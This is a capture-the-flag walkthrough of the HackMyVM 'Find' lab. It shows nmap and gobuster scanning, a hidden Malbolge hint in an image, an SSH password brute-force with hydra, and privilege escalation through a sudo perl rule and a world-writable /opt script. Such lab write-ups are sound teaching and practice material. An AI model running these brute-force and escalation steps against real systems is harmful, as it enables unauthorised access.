NOTES ABOUT Find
[ 2022-10-10 ] [ HackMyVM / Find ]Status: Rooted
Skills: Port Scanning, Fuzz, Dictionary Attact, bash
Tools: nmap, gobuster, ssh, hydra
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA)
| 256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA)
|_ 256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
GETTING IN
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.24
/index.html (Status: 200) [Size: 10701]
/manual (Status: 301) [Size: 307] [--> http://10.0.2.24/manual/]
/robots.txt (Status: 200) [Size: 13] => "find user :)"
/server-status (Status: 403) [Size: 274]
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,jpeg,png,gif -u http://10.0.2.24
/cat.jpg (Status: 200) [Size: 35137]
/manual (Status: 301) [Size: 307] [--> http://10.0.2.24/manual/]
/server-status (Status: 403) [Size: 274]
$ wget http://10.0.2.24/cat.jpg
$ strings cat.jpg
JFIF
@File source: https://commons.wikimedia.org/wiki/File:Cat03.jpg
, #&')*)
[...]
>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR
LAST STRING OF FILE SHOULD BE COMPILED IN "Malbolge Language"
USER: *****
$ hydra -l ****** -P /usr/share/wordlists/rockyou.txt 10.0.2.24 ssh
[...]
[DATA] attacking ssh://10.0.2.24:22/
[22][ssh] host: 10.0.2.24 login: ***** password: iloveyou
[...]
$ ssh ******@10.0.2.24
*****@10.0.2.24\'s password:
ELEVATING PRIVILEGES
******@find:~$ sudo -l
[sudo] password for ******:
Matching Defaults entries for ****** on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ****** may run the following commands on find:
(kings) /usr/bin/perl
******@find:~$ sudo -u kings /usr/bin/perl -e 'exec "/bin/bash";'
kings@find:/home/******$ cd ~
kings@find:~$ cat user.txt
******************
kings@find:~$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:~$ echo '!#/bin/bash' > /opt/boom/boom.sh
kings@find:~$ echo 'bash' >> /opt/boom/boom.sh
kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kings may run the following commands on find:
(ALL) NOPASSWD: /opt/boom/boom.sh
kings@find:~$ sudo /opt/boom/boom.sh
sudo: /opt/boom/boom.sh: command not found
kings@find:~$ ls -la /opt/
total 12
drwxrwxrwx 3 root root 4096 Oct 9 23:35 .
drwxr-xr-x 18 root root 4096 May 11 10:19 ..
kings@find:~$ mkdir /opt/boom
kings@find:~$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:~$ echo '!#/bin/bash' > /opt/boom/boom.sh
kings@find:~$ chmod +x /opt/boom/boom.sh
kings@find:~$ sudo /opt/boom/boom.sh
root@find:/home/kings# cat /root/root.txt
******************
root@find:~# init 0